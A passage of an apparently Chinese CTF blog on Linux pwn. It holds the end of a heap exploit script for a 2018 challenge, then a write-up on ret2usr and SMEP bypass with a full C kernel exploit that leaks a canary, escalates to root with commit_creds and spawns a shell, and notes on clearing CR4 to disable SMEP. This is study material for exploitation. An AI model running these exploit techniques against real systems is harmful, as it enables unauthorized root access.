<span class="c1"># __malloc_hook - 0x13 -&gt; 0x7f</span> <span class="n">add</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="c1"># 0x7f</span> <span class="n">delete</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="c1"># chunk4 -&gt; 0x7f</span> <span class="n">edit</span><span class="p">(</span><span class="mi">4</span><span class="p">,</span> <span class="mi">7</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">))</span> <span class="c1"># chunk4</span> <span class="c1"># unsorted bin attack</span> <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="n">edit</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="n">flat</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0</span><span class="s1">&#39;</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\x1b</span><span class="s1">&#39;</span><span class="p">))</span> <span class="n">add</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mh">0x68</span><span class="p">)</span> <span class="c1"># partial overwrite</span> <span class="c1"># DEBUG() </span> <span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;one_gadget&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xf02a4</span> <span class="n">libc</span><span class="o">.</span><span class="n">address</span> <span class="o">=</span> <span class="mh">0x7ffff7a0d000</span> <span class="n">info</span><span class="p">(</span><span class="s2">&#34;one_gadget -&gt; {:#x}&#34;</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;one_gadget&#39;</span><span class="p">]))</span> <span class="n">edit</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="s1">&#39;</span><span class="se">\0\0\0</span><span class="s1">&#39;</span> <span class="o">+</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc</span><span class="o">.</span><span class="n">sym</span><span class="p">[</span><span class="s1">&#39;one_gadget&#39;</span><span class="p">])[:</span> <span class="mi">3</span><span class="p">])</span> <span class="c1"># trigger one_gadget</span> <span class="n">delete</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="n">delete</span><span class="p">(</span><span class="mi">4</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">io</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s2">&#34;echo ABCDEFG&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s2">&#34;ABCDEFG&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">sendline</span><span class="p">(</span><span class="s2">&#34;ls&#34;</span><span class="p">)</span> <span class="n">io</span><span class="o">.</span><span class="n">interactive</span><span class="p">()</span> <span class="k">except</span><span class="p">:</span> <span class="n">io</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p>再贴一下其他师父这道题目的 wp</p> <p><a href="http://p4nda.top/2018/10/14/hwb-ctf-2018/#calendar">http://p4nda.top/2018/10/14/hwb-ctf-2018/#calendar</a></p> <p><a href="https://veritas501.space/2018/10/15/">https://veritas501.space/2018/10/15/</a>护网杯%20pwn%20wp/</p> <p><a href="https://www.anquanke.com/post/id/162121">https://www.anquanke.com/post/id/162121</a></p> <p>以及 house of roman 的参考</p> <p><a href="https://www.anquanke.com/post/id/162121">https://www.anquanke.com/post/id/162121</a></p> https://bash-c.github.io/post/linux-kernel-pwn-abc-2/ Sat, 06 Oct 2018 12:57:09 +0800 https://bash-c.github.io/post/linux-kernel-pwn-abc-2/ <p>这一篇讲 ret2usr 攻击和 smep 保护。主要参考了 <a href="https://github.com/bash-c/slides/blob/master/pwn_kernel/smep_bypass.pdf">Pratical SMEP bypass techniques on Linux</a>。</p> <h2 id="ret2usr">ret2usr</h2> <p>ret2usr 攻击利用了 <strong>用户空间的进程不能访问内核空间，但内核空间能访问用户空间</strong> 这个特性来定向内核代码或数据流指向用户控件，以 <code>ring 0</code> 特权执行用户空间代码完成提权等操作。</p> <h3 id="2018-强网杯---core">2018 强网杯 - core</h3> <p>上一篇分析了使用 <a href="http://m4x.fun/post/linux-kernel-pwn-abc-1/#kernel-rop-2018%E5%BC%BA%E7%BD%91%E6%9D%AF-core">kernel rop</a> 完成提权拿 shell 的步骤，这一篇分析一下使用 ret2usr 手法获取 root shell。</p> <p>题目就不再分析了，直接分析 exp。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span class="lnt"> 12 </span><span class="lnt"> 13 </span><span class="lnt"> 14 </span><span class="lnt"> 15 </span><span class="lnt"> 16 </span><span class="lnt"> 17 </span><span class="lnt"> 18 </span><span class="lnt"> 19 </span><span class="lnt"> 20 </span><span class="lnt"> 21 </span><span class="lnt"> 22 </span><span class="lnt"> 23 </span><span class="lnt"> 24 </span><span class="lnt"> 25 </span><span class="lnt"> 26 </span><span class="lnt"> 27 </span><span class="lnt"> 28 </span><span class="lnt"> 29 </span><span class="lnt"> 30 </span><span class="lnt"> 31 </span><span class="lnt"> 32 </span><span class="lnt"> 33 </span><span class="lnt"> 34 </span><span class="lnt"> 35 </span><span class="lnt"> 36 </span><span class="lnt"> 37 </span><span class="lnt"> 38 </span><span class="lnt"> 39 </span><span class="lnt"> 40 </span><span class="lnt"> 41 </span><span class="lnt"> 42 </span><span class="lnt"> 43 </span><span class="lnt"> 44 </span><span class="lnt"> 45 </span><span class="lnt"> 46 </span><span class="lnt"> 47 </span><span class="lnt"> 48 </span><span class="lnt"> 49 </span><span class="lnt"> 50 </span><span class="lnt"> 51 </span><span class="lnt"> 52 </span><span class="lnt"> 53 </span><span class="lnt"> 54 </span><span class="lnt"> 55 </span><span class="lnt"> 56 </span><span class="lnt"> 57 </span><span class="lnt"> 58 </span><span class="lnt"> 59 </span><span class="lnt"> 60 </span><span class="lnt"> 61 </span><span class="lnt"> 62 </span><span class="lnt"> 63 </span><span class="lnt"> 64 </span><span class="lnt"> 65 </span><span class="lnt"> 66 </span><span class="lnt"> 67 </span><span class="lnt"> 68 </span><span class="lnt"> 69 </span><span class="lnt"> 70 </span><span class="lnt"> 71 </span><span class="lnt"> 72 </span><span class="lnt"> 73 </span><span class="lnt"> 74 </span><span class="lnt"> 75 </span><span class="lnt"> 76 </span><span class="lnt"> 77 </span><span class="lnt"> 78 </span><span class="lnt"> 79 </span><span class="lnt"> 80 </span><span class="lnt"> 81 </span><span class="lnt"> 82 </span><span class="lnt"> 83 </span><span class="lnt"> 84 </span><span class="lnt"> 85 </span><span class="lnt"> 86 </span><span class="lnt"> 87 </span><span class="lnt"> 88 </span><span class="lnt"> 89 </span><span class="lnt"> 90 </span><span class="lnt"> 91 </span><span class="lnt"> 92 </span><span class="lnt"> 93 </span><span class="lnt"> 94 </span><span class="lnt"> 95 </span><span class="lnt"> 96 </span><span class="lnt"> 97 </span><span class="lnt"> 98 </span><span class="lnt"> 99 </span><span class="lnt">100 </span><span class="lnt">101 </span><span class="lnt">102 </span><span class="lnt">103 </span><span class="lnt">104 </span><span class="lnt">105 </span><span class="lnt">106 </span><span class="lnt">107 </span><span class="lnt">108 </span><span class="lnt">109 </span><span class="lnt">110 </span><span class="lnt">111 </span><span class="lnt">112 </span><span class="lnt">113 </span><span class="lnt">114 </span><span class="lnt">115 </span><span class="lnt">116 </span><span class="lnt">117 </span><span class="lnt">118 </span><span class="lnt">119 </span><span class="lnt">120 </span><span class="lnt">121 </span><span class="lnt">122 </span><span class="lnt">123 </span><span class="lnt">124 </span><span class="lnt">125 </span><span class="lnt">126 </span><span class="lnt">127 </span><span class="lnt">128 </span><span class="lnt">129 </span><span class="lnt">130 </span><span class="lnt">131 </span><span class="lnt">132 </span><span class="lnt">133 </span><span class="lnt">134 </span><span class="lnt">135 </span><span class="lnt">136 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp"> </span><span class="cp">#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp"> </span><span class="cp"></span> <span class="n">size_t</span> <span class="n">user_cs</span><span class="p">,</span> <span class="n">user_ss</span><span class="p">,</span> <span class="n">user_rflags</span><span class="p">,</span> <span class="n">user_sp</span><span class="p">;</span> <span class="kt">void</span> <span class="nf">save_status</span><span class="p">()</span> <span class="p">{</span> <span class="n">__asm__</span><span class="p">(</span><span class="s">&#34;mov user_cs, cs;&#34;</span> <span class="s">&#34;mov user_ss, ss;&#34;</span> <span class="s">&#34;mov user_sp, rsp;&#34;</span> <span class="s">&#34;pushf;&#34;</span> <span class="s">&#34;pop user_rflags;&#34;</span> <span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]status has been saved.&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">get_shell</span><span class="p">(</span><span class="kt">void</span><span class="p">){</span> <span class="n">system</span><span class="p">(</span><span class="s">&#34;/bin/sh&#34;</span><span class="p">);</span> <span class="p">}</span> <span class="n">size_t</span> <span class="n">commit_creds</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">prepare_kernel_cred</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">size_t</span> <span class="n">raw_vmlinux_base</span> <span class="o">=</span> <span class="mh">0xffffffff81000000</span><span class="p">;</span> <span class="n">size_t</span> <span class="n">vmlinux_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">size_t</span> <span class="nf">find_symbols</span><span class="p">()</span> <span class="p">{</span> <span class="n">FILE</span><span class="o">*</span> <span class="n">kallsyms_fd</span> <span class="o">=</span> <span class="n">fopen</span><span class="p">(</span><span class="s">&#34;/tmp/kallsyms&#34;</span><span class="p">,</span> <span class="s">&#34;r&#34;</span><span class="p">);</span> <span class="cm">/* FILE* kallsyms_fd = fopen(&#34;./test_kallsyms&#34;, &#34;r&#34;); */</span> <span class="k">if</span><span class="p">(</span><span class="n">kallsyms_fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]open kallsyms error!&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x30</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="k">while</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mh">0x30</span><span class="p">,</span> <span class="n">kallsyms_fd</span><span class="p">))</span> <span class="p">{</span> <span class="k">if</span><span class="p">(</span><span class="n">commit_creds</span> <span class="o">&amp;</span> <span class="n">prepare_kernel_cred</span><span class="p">)</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">&#34;commit_creds&#34;</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">commit_creds</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* puts(buf); */</span> <span class="kt">char</span> <span class="n">hex</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">strncpy</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> <span class="cm">/* printf(&#34;hex: %s\n&#34;, hex); */</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="s">&#34;%llx&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">commit_creds</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;commit_creds addr: %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">commit_creds</span><span class="p">);</span> <span class="n">vmlinux_base</span> <span class="o">=</span> <span class="n">commit_creds</span> <span class="o">-</span> <span class="mh">0x9c8e0</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;vmlinux_base addr: %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">vmlinux_base</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="n">strstr</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="s">&#34;prepare_kernel_cred&#34;</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">prepare_kernel_cred</span><span class="p">)</span> <span class="p">{</span> <span class="cm">/* puts(buf); */</span> <span class="kt">char</span> <span class="n">hex</span><span class="p">[</span><span class="mi">20</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">strncpy</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mi">16</span><span class="p">);</span> <span class="n">sscanf</span><span class="p">(</span><span class="n">hex</span><span class="p">,</span> <span class="s">&#34;%llx&#34;</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">prepare_kernel_cred</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;prepare_kernel_cred addr: %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">prepare_kernel_cred</span><span class="p">);</span> <span class="n">vmlinux_base</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span> <span class="o">-</span> <span class="mh">0x9cce0</span><span class="p">;</span> <span class="cm">/* printf(&#34;vmlinux_base addr: %p\n&#34;, vmlinux_base); */</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">prepare_kernel_cred</span> <span class="o">&amp;</span> <span class="n">commit_creds</span><span class="p">))</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]Error!&#34;</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">get_root</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span><span class="o">*</span> <span class="p">(</span><span class="o">*</span><span class="n">pkc</span><span class="p">)(</span><span class="kt">int</span><span class="p">)</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span> <span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">cc</span><span class="p">)(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">commit_creds</span><span class="p">;</span> <span class="p">(</span><span class="o">*</span><span class="n">cc</span><span class="p">)((</span><span class="o">*</span><span class="n">pkc</span><span class="p">)(</span><span class="mi">0</span><span class="p">));</span> <span class="cm">/* puts(&#34;[*] root now.&#34;); */</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">set_off</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">idx</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;[*]set off to %ld</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x6677889C</span><span class="p">,</span> <span class="n">idx</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">core_read</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*]read to buf.&#34;</span><span class="p">);</span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x6677889B</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">core_copy_func</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">long</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;[*]copy from user with size: %ld</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span> <span class="n">ioctl</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x6677889A</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span> <span class="n">find_symbols</span><span class="p">();</span> <span class="n">size_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">vmlinux_base</span> <span class="o">-</span> <span class="n">raw_vmlinux_base</span><span class="p">;</span> <span class="n">save_status</span><span class="p">();</span> <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="s">&#34;/proc/core&#34;</span><span class="p">,</span><span class="n">O_RDWR</span><span class="p">);</span> <span class="n">set_off</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0x40</span><span class="p">);</span> <span class="n">size_t</span> <span class="n">buf</span><span class="p">[</span><span class="mh">0x40</span><span class="o">/</span><span class="mi">8</span><span class="p">];</span> <span class="n">core_read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">buf</span><span class="p">);</span> <span class="n">size_t</span> <span class="n">canary</span> <span class="o">=</span> <span class="n">buf</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span> <span class="n">printf</span><span class="p">(</span><span class="s">&#34;[*]canary : %p</span><span class="se">\n</span><span class="s">&#34;</span><span class="p">,</span> <span class="n">canary</span><span class="p">);</span> <span class="n">size_t</span> <span class="n">rop</span><span class="p">[</span><span class="mh">0x30</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="mi">0</span><span class="p">};</span> <span class="n">rop</span><span class="p">[</span><span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="n">canary</span> <span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">size_t</span><span class="p">)</span><span class="n">get_root</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81a012da</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// swapgs; popfq; ret </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0xffffffff81050ac2</span> <span class="o">+</span> <span class="n">offset</span><span class="p">;</span> <span class="c1">// iretq; ret; </span><span class="c1"></span> <span class="n">rop</span><span class="p">[</span><span class="mi">14</span><span class="p">]</span> <span class="o">=</span> <span class="p">(</span><span class="n">size_t</span><span class="p">)</span><span class="n">get_shell</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="mi">15</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="mi">17</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span> <span class="n">rop</span><span class="p">[</span><span class="mi">18</span><span class="p">]</span> <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span> <span class="n">puts</span><span class="p">(</span><span class="s">&#34;[*] DEBUG: &#34;</span><span class="p">);</span> <span class="n">getchar</span><span class="p">();</span> <span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">rop</span><span class="p">,</span> <span class="mh">0x30</span> <span class="o">*</span> <span class="mi">8</span><span class="p">);</span> <span class="n">core_copy_func</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="mh">0xffffffffffff0000</span> <span class="o">|</span> <span class="p">(</span><span class="mh">0x100</span><span class="p">));</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>比较一下和 <a href="https://github.com/bash-c/pwn_repo/blob/master/QWB2018_core/rop.c">kernel rop</a> 做法的异同。</p> <ol> <li>通过读取 <code>/tmp/kallsyms</code> 获取 <code>commit_creds</code> 和 <code>prepare_kernel_cred</code> 的方法相同，同时根据这些偏移能确定 gadget 的地址。</li> <li>leak canary 的方法也相同，通过控制全局变量 <code>off</code> 读出 canary。</li> <li>与 kernel rop 做法不同的是 rop 链的构造 <ol> <li>kernel rop 通过 内核空间的 rop 链达到执行 <code>commit_creds(prepare_kernel_cred(0))</code> 以提权目的，之后通过 <code>swapgs; iretq</code> 等返回到用户态，执行用户空间的 <code>system(&quot;/bin/sh&quot;)</code> 获取 shell</li> <li>ret2usr 做法中，直接返回到用户空间构造的 <code>commit_creds(prepare_kernel_cred(0))</code> （通过函数指针实现）来提权，虽然这两个函数位于内核空间，但此时我们是 <code>ring 0</code> 特权，因此可以正常运行。之后也是通过 <code>swapgs; iretq</code> 返回到用户态来执行用户空间的 <code>system(&quot;/bin/sh&quot;)</code></li> </ol> </li> </ol> <p>从这两种做法的比较可以体会出之所以要 <code>ret2usr</code>，是因为一般情况下在用户空间构造特定目的的代码要比在内核空间简单得多。</p> <h2 id="smep">SMEP</h2> <p>为了防止 <code>ret2usr</code> 攻击，内核开发者提出了 <code>smep</code> 保护，smep 全程(Supervisor Mode Execution Protection)，是内核的一种保护措施，作用是当 CPU 处于 <code>ring0</code> 模式时，执行 <code>用户空间的代码</code> 会触发页错误；这个保护在 arm 中被称为 <code>PXN</code>。</p> <p>通过 qemu 启动内核时的选项可以判断是否开启了 smep 保护。</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> grep smep ./boot.sh qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append <span class="s1">&#39;console=ttyS0 root=/dev/ram oops=panic panic=1&#39;</span> -enable-kvm -monitor /dev/null -m 64M --nographic -smp <span class="nv">cores</span><span class="o">=</span>1,threads<span class="o">=</span><span class="m">1</span> -cpu kvm64,+smep </code></pre></td></tr></table> </div> </div><p>也可以通过</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-bash" data-lang="bash">CISCN2017_babydriver <span class="o">[</span>master●●<span class="o">]</span> grep smep /proc/cpuinfo flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb invpcid_single pti tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap intel_pt xsaveopt dtherm ida arat pln pts ...... </code></pre></td></tr></table> </div> </div><p>检测该保护是否开启。</p> <h3 id="smep-和-cr4-寄存器">smep 和 CR4 寄存器</h3> <p>系统根据 CR4 寄存器的值判断是否开启 smep 保护，当 CR4 寄存器的第 20 位是 1 时，保护开启；是 0 时，保护关闭。</p> <p><img src="http://ww1.sinaimg.cn/large/006AWYXBly1fvzmqcu1irj30py06egmo.jpg" alt=""></p> <p>例如，当</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-fallback" data-lang="fallback">$CR4 = 0x1407f0 = 000 1 0100 0000 0111 1111 0000 </code></pre></td></tr></table> </div> </div><p>时，smep 保护开启。而 CR4 寄存器是可以通过 mov 指令修改的，因此只需要</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-asm" data-lang="asm"><span class="nf">mov</span> <span class="no">cr4</span><span class="p">,</span> <span class="mi">0x1407e0</span> <span class="c"># 0x1407e0 = 101 0 0000 0011 1111 00000 </span></code></pre></td></tr></table> </div> </div><p>即可关闭 smep 保护。</p> <p>搜索一下从 <code>vmlinux</code> 中提取出的 gadget，很容易就能达到这个目的。</p> <ul> <li>如何查看 CR4 寄存器的值？ <ul> <li>gdb 无法查看 cr4 寄存器的值，可以通过 kernel crash 时的信息查看。为了关闭 smep 保护，常用一个固定值 <code>0x6f0</code>，即 <code>mov cr4, 0x6f0</code>。</li> </ul> </li> </ul> <h3 id="ciscn2017---babydriver">CISCN2017 - babydriver</h3> <p>之前已经分析过使用 <a href="http://m4x.fun/post/linux-kernel-pwn-abc-1/#kernel-uaf-ciscn2017-babydriver">uaf 改 cred</a> 的做法，这次换一种方法，通过关闭 smep 保护和 ret2usr 来提权。</p> <p>这里选取的方法是先通过 uaf 控制一个 <code>tty_struct</code> 结构，在 <code>open(&quot;/dev/ptmx&quot;, O_RDWR)</code> 时会分配这样一个结构体</p> <p><code>tty_struct</code> 的 <a href="https://code.woboq.org/linux/linux/include/linux/tty.h.html#tty_struct">源码</a> 如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C" data-lang="C"><span class="k">struct</span> <span class="n">tty_struct</span> <span class="p">{</span> <span class="kt">int</span> <span class="n">magic</span><span class="p">;</span> <span class="k">struct</span> <span class="n">kref</span> <span class="n">kref</span><span class="p">;</span> <span class="k">struct</span> <span class="n">device</span> <span class="o">*</span><span class="n">dev</span><span class="p">;</span> <span class="k">struct</span> <span class="n">tty_driver</span> <span class="o">*</span><span class="n">driver</span><span class="p">;</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">tty_operations</span> <span class="o">*</span><span class="n">ops</span><span class="p">;</span> <span class="kt">int</span> <span class="n">index</span><span class="p">;</span> <span class="cm">/* Protects ldisc changes: Lock tty not pty */</span> <span class="k">struct</span> <span class="n">ld_semaphore</span> <span class="n">ldisc_sem</span><span class="p">;</span> <span class="k">struct</span> <span class="n">tty_ldisc</span> <span class="o">*</span><span class="n">ldisc</span><span class="p">;</span> <span class="k">struct</span> <span 